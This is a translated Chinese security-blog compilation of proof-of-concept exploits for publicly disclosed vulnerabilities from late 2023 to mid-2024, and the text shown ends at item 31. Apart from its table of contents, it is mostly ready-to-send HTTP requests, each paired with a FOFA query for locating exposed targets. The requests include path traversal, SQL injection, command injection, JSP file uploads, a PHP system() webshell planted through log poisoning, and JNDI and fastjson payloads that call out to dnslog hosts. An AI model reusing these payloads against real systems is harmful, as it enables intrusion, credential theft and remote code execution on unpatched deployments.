Compilation of Publicly Disclosed Internet Vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is reproduced from 网络安全新视界; author: 网络安全新视界

Purpose: exploitation of N-day vulnerabilities accounts for a large share of attacks in offensive/defensive security exercises, and this article is intended to help with defence. Defenders can use its contents to check their own exposure.

Vulnerability sources: the article covers 203 POCs for high-severity vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the internet and were compiled and published by the 网络安全新视界 team.

Security patches: all vulnerabilities listed are already public; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few overly long POCs are replaced by the word PAYLOAD; if you need the complete POC, search for it yourself.

Legal notice: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend to have the relevant content removed.

Statement
To simplify the process and make browsing easier, there is no "reply to receive the full list" gate. This article is the most complete version available; when using it, press F12 and search for keywords.

Bookmark this article if you find it useful, and consider following this public account (网络安全新视界).

Contents

01
1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌 EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌 EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华 ICC intelligent IoT integrated management platform arbitrary file read
21. 大华 ICC intelligent IoT integrated management platform random remote code execution
22. 大华 ICC intelligent IoT integrated management platform log4j remote code execution
23. 大华 ICC intelligent IoT integrated management platform fastjson remote code execution
24. 用友 NC 6.5 accept.jsp arbitrary file upload
25. 用友 NC registerServlet JNDI remote code execution
26. 用友 NC linkVoucher SQL injection
27. 用友 NC showcontent SQL injection
28. 用友 NC grouptemplet arbitrary file upload
29. 用友 NC down/bill SQL injection
30. 用友 NC importPml SQL injection
31. 用友 NC runStateServlet SQL injection
32. 用友 NC complainbilldetail SQL injection
33. 用友 NC downTax/download SQL injection
34. 用友 NC warningDetailInfo endpoint SQL injection
35. 用友 NC-Cloud importhttpscer arbitrary file upload
36. 用友 NC-Cloud soapFormat XXE
37. 用友 NC-Cloud IUpdateService XXE
38. 用友 U8 Cloud smartweb2.RPC.d XXE
39. 用友 U8 Cloud RegisterServlet SQL injection
40. 用友 U8-Cloud XChangeServlet XXE
41. 用友 U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友 GRP-U8 SmartUpload01 file upload
43. 用友 GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友 GRP-U8 bx_dj_check.jsp SQL injection
45. 用友 GRP-U8 ufgovbank XXE
46. 用友 GRP-U8 sqcxIndex.jsp SQL injection
47. 用友 GRP A++Cloud government finance cloud arbitrary file read
48. 用友 U8 CRM swfupload arbitrary file upload
49. 用友 U8 CRM uploadfile.php endpoint arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. 泛微 E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通 T+ getstorewarehousebystore remote code execution
55. 畅捷通 T+ getdecallusers information disclosure
56. 畅捷通 T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通 T+ keyEdit.aspx SQL injection
58. 畅捷通 T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云一脸通 smart management platform 1.0.55.0.0.1 permission bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远 OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远 M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 掌上校园 service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp endpoint arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password leak
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording and broadcasting system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. 广联达 Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立讯 communications command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD licence plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet access behaviour management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload endpoint file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. 方正 all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC List

02
1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 hash of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. 深信服 NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin backend with the default account admin, then perform the following operation.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step one>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL-encoding of the following statement:
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌 EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. 蓝凌 EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step one: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request; the planted function executes a command that is passed base64-encoded.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword

Send the following request to the lab target to execute the id command; the request-header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a function that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华 ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华 ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. 大华 ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
  "loginName":"${jndi:ldap://dnslog}"
}

23. 大华 ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://DNSLOG"}
  }""
}

24. 用友 NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

The uploaded file is then reachable at:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
